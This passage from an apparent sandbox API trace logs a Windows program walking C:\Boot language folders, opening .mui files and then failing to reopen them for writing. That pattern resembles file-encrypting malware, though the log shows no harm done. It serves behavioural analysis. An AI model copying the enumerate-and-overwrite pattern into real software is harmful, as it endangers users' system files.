ftLastAccessTime.dwLowDateTime=0x5168548b, ftLastAccessTime.dwHighDateTime=0x1d3271b, ftLastWriteTime.dwLowDateTime=0xe318f070, ftLastWriteTime.dwHighDateTime=0x1d112e1, nFileSizeHigh=0x0, nFileSizeLow=0xaf58, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0070.726] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0070.726] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0070.726] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0070.726] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0070.726] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0070.726] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0070.726] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0070.726] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0070.727] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0070.727] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0070.727] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0070.727] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0070.727] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0070.727] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0070.727] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0070.727] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0070.727] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0070.727] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0070.727] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0070.727] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d790 [0070.727] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0070.727] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0070.727] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cce8 [0070.727] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d790 | out: hHeap=0x20000) returned 1 [0070.727] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.727] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.727] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.727] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.727] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cce8 | out: hHeap=0x20000) returned 1 [0070.727] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.727] AreFileApisANSI () returned 1 [0070.727] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\sr-Latn-CS\\memtest.exe.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\sr-Latn-CS\\memtest.exe.mui", lpUsedDefaultChar=0x0) returned 35 [0070.727] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0070.727] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.727] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.727] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0070.727] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0070.727] AreFileApisANSI () returned 1 [0070.727] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 35 [0070.728] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68d60 [0070.728] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x68d60, cchWideChar=35 | out: lpWideCharStr="C:\\Boot\\sr-Latn-CS\\memtest.exe.mui") returned 35 [0070.728] CreateFileW (lpFileName="C:\\Boot\\sr-Latn-CS\\memtest.exe.mui" (normalized: "c:\\boot\\sr-latn-cs\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0070.728] GetFileType (hFile=0x41c) returned 0x1 [0070.728] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0070.728] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0070.728] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0070.728] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0070.728] CloseHandle (hObject=0x41c) returned 1 [0070.729] AreFileApisANSI () returned 1 [0070.729] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 35 [0070.729] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69170 [0070.729] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x69170, cchWideChar=35 | out: lpWideCharStr="C:\\Boot\\sr-Latn-CS\\memtest.exe.mui") returned 35 [0070.729] CreateFileW (lpFileName="C:\\Boot\\sr-Latn-CS\\memtest.exe.mui" (normalized: "c:\\boot\\sr-latn-cs\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.729] GetLastError () returned 0x5 [0070.729] GetLastError () returned 0x5 [0070.729] SetLastError (dwErrCode=0x5) [0070.729] GetLastError () returned 0x5 [0070.729] SetLastError (dwErrCode=0x5) [0070.729] GetLastError () returned 0x5 [0070.729] SetLastError (dwErrCode=0x5) [0070.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69170 | out: hHeap=0x20000) returned 1 [0070.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0070.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0070.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0070.729] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.729] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.729] FindNextFileW (in: hFindFile=0x78090, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x44, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x6d168, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x44, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓꽘")) returned 0 [0070.729] FindClose (in: hFindFile=0x78090 | out: hFindFile=0x78090) returned 1 [0070.729] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0070.729] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0070.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0070.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0070.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0070.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0070.730] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0070.730] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0070.730] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0070.730] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x469e8 | out: hHeap=0x20000) returned 1 [0070.730] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0070.730] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0070.730] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0070.730] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0070.730] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfb0 [0070.730] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0070.730] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0070.730] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0070.730] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0070.730] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0070.730] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0070.730] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0070.730] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0070.730] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0070.730] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0070.730] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0070.730] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.730] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.730] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.730] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.730] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0070.730] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0070.730] AreFileApisANSI () returned 1 [0070.730] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\sr-Latn-RS", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\sr-Latn-RS", lpUsedDefaultChar=0x0) returned 19 [0070.730] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0070.730] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.730] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.730] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0070.730] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfb0 [0070.731] AreFileApisANSI () returned 1 [0070.731] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88810, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 19 [0070.731] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x26) returned 0x7aae8 [0070.731] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88810, cbMultiByte=-1, lpWideCharStr=0x7aae8, cchWideChar=19 | out: lpWideCharStr="C:\\Boot\\sr-Latn-RS") returned 19 [0070.731] CreateFileW (lpFileName="C:\\Boot\\sr-Latn-RS" (normalized: "c:\\boot\\sr-latn-rs"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.731] GetLastError () returned 0x5 [0070.731] GetLastError () returned 0x5 [0070.731] SetLastError (dwErrCode=0x5) [0070.731] GetLastError () returned 0x5 [0070.731] SetLastError (dwErrCode=0x5) [0070.731] GetLastError () returned 0x5 [0070.731] SetLastError (dwErrCode=0x5) [0070.731] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7aae8 | out: hHeap=0x20000) returned 1 [0070.731] AreFileApisANSI () returned 1 [0070.731] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88810, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 19 [0070.731] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x26) returned 0x7a7b8 [0070.731] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88810, cbMultiByte=-1, lpWideCharStr=0x7a7b8, cchWideChar=19 | out: lpWideCharStr="C:\\Boot\\sr-Latn-RS") returned 19 [0070.731] CreateFileW (lpFileName="C:\\Boot\\sr-Latn-RS" (normalized: "c:\\boot\\sr-latn-rs"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.731] GetLastError () returned 0x5 [0070.731] GetLastError () returned 0x5 [0070.731] SetLastError (dwErrCode=0x5) [0070.731] GetLastError () returned 0x5 [0070.731] SetLastError (dwErrCode=0x5) [0070.732] GetLastError () returned 0x5 [0070.732] SetLastError (dwErrCode=0x5) [0070.732] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7a7b8 | out: hHeap=0x20000) returned 1 [0070.732] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0070.732] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0070.732] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0070.732] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.732] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.732] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.732] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.732] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0070.732] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0070.732] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0070.732] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.732] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0070.732] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0070.732] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0070.732] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa01adf43, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6a2250, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="sv-SE", cAlternateFileName="")) returned 1 [0070.732] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0070.732] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0070.732] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0070.732] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0070.732] FindFirstFileExW (in: lpFileName="C:\\Boot\\sr-Latn-RS\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78350 [0070.732] FindNextFileW (in: hFindFile=0x78350, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc495eef9, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0070.732] FindNextFileW (in: hFindFile=0x78350, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x21212f9a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12d60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0070.732] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0070.732] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0070.732] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0070.733] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0070.733] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0070.733] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0070.733] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0070.733] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0070.733] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0070.733] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0070.733] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0070.733] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46b38 [0070.733] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0070.733] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfb0 [0070.733] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0070.733] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0070.733] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0070.733] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0070.733] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0070.733] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0070.733] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0070.733] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0070.733] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0070.733] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0070.733] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cce8 [0070.733] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0070.733] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0070.733] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cdf0 [0070.733] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cce8 | out: hHeap=0x20000) returned 1 [0070.733] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.733] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.849] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.849] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.849] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cdf0 | out: hHeap=0x20000) returned 1 [0070.849] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.849] AreFileApisANSI () returned 1 [0070.849] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\sr-Latn-RS\\bootmgr.exe.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\sr-Latn-RS\\bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 35 [0070.849] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0070.849] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.849] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.849] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0070.850] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfb0 [0070.857] AreFileApisANSI () returned 1 [0070.857] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 35 [0070.857] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69490 [0070.858] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dee0, cbMultiByte=-1, lpWideCharStr=0x69490, cchWideChar=35 | out: lpWideCharStr="C:\\Boot\\sr-Latn-RS\\bootmgr.exe.mui") returned 35 [0070.858] CreateFileW (lpFileName="C:\\Boot\\sr-Latn-RS\\bootmgr.exe.mui" (normalized: "c:\\boot\\sr-latn-rs\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0070.858] GetFileType (hFile=0x418) returned 0x1 [0070.858] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69490 | out: hHeap=0x20000) returned 1 [0070.858] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0070.858] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, 